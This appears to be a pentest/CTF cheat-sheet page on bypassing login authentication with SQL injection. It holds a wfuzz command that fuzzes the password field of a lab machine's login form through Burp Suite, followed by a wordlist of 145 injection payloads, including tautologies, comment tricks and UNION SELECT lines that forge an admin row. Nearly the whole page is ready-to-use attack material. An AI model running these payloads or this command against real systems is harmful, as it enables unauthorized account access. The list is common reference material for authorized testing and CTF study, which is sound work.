Authentication bypass

Authentication bypass with SQL

Sending all the request through burpsuite (-p option)
1
wfuzz -c -z file,sqlibypass.txt -d "__csrf_magic=sid%3Aa839ec5433fa491b740a65d8466329fe409d20b0%2C1569615456&usernamefld=admin&passwordfld=FUZZ&login=Login" -u http://10.10.10.60/index.php -p 127.0.0.1:8080 -L
Copied!
Payloads available on:
GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
GitHub
Wordlist to use with Burpsuite Intruder:
1
' or 1=1 LIMIT 1 --
2
' or 1=1 LIMIT 1 -- -
3
' or 1=1 LIMIT 1#
4
'or 1#
5
' or 1=1 --
6
' or 1=1 --
7
'*'
8
') OR 1=1 LIMIT 1 #
9
'-'
10
' '
11
'&'
12
'^'
13
'*'
14
' or ''-'
15
' or '' '
16
' or ''&'
17
' or ''^'
18
' or ''*'
19
"-"
20
" "
21
"&"
22
"^"
23
"*"
24
" or ""-"
25
" or "" "
26
" or ""&"
27
" or ""^"
28
" or ""*"
29
or true--
30
" or true--
31
' or true--
32
") or true--
33
') or true--
34
' or 'x'='x
35
') or ('x')=('x
36
')) or (('x'))=(('x
37
" or "x"="x
38
") or ("x")=("x
39
")) or (("x"))=(("x
40
or 1=1
41
or 1=1--
42
or 1=1#
43
or 1=1/*
44
admin' --
45
admin' #
46
admin'/*
47
admin' or '1'='1
48
admin' or '1'='1'--
49
admin' or '1'='1'#
50
admin' or '1'='1'/*
51
admin'or 1=1 or ''='
52
admin' or 1=1
53
admin' or 1=1--
54
admin' or 1=1#
55
admin' or 1=1#;
56
wronguser' or 1=1 LIMIT 1;#
57
admin' or 1=1/*
58
admin') or ('1'='1
59
admin') or ('1'='1'--
60
admin') or ('1'='1'#
61
admin') or ('1'='1'/*
62
admin') or '1'='1
63
admin') or '1'='1'--
64
admin') or '1'='1'#
65
admin') or '1'='1'/*
66
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
67
admin" --
68
admin" #
69
admin"/*
70
admin" or "1"="1
71
admin" or "1"="1"--
72
admin" or "1"="1"#
73
admin" or "1"="1"/*
74
admin"or 1=1 or ""="
75
admin" or 1=1
76
admin" or 1=1--
77
admin" or 1=1#
78
admin" or 1=1/*
79
admin") or ("1"="1
80
admin") or ("1"="1"--
81
admin") or ("1"="1"#
82
admin") or ("1"="1"/*
83
admin") or "1"="1
84
admin") or "1"="1"--
85
admin") or "1"="1"#
86
admin") or "1"="1"/*
87
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
88
-'
89
' '
90
'&'
91
'^'
92
'*'
93
' or ''-'
94
' or '' '
95
' or ''&'
96
' or ''^'
97
' or ''*'
98
"-"
99
" "
100
"&"
101
"^"
102
"*"
103
" or ""-"
104
" or "" "
105
" or ""&"
106
" or ""^"
107
" or ""*"
108
or true--
109
" or true--
110
' or true--
111
") or true--
112
') or true--
113
' or 'x'='x
114
') or ('x')=('x
115
')) or (('x'))=(('x
116
" or "x"="x
117
") or ("x")=("x
118
")) or (("x"))=(("x
119
' or '1'='1
120
'
121
''
122
`
123
``
124
,
125
"
126
""
127
/
128
//
129
\
130
\\
131
;
132
' or "
133
-- or #
134
' OR '1
135
' OR 1 -- -
136
" OR "" = "
137
" OR 1 = 1 -- -
138
' OR '' = '
139
'='
140
'LIKE'
141
'=0--+
142
OR 1=1
143
' OR 'x'='x
144
' AND id IS NULL; --
145
'''''''''''''UNION SELECT '2
Copied!

References

SQL-Injections · Total OSCP Guide
NetSPI SQL Injection Wiki
netspi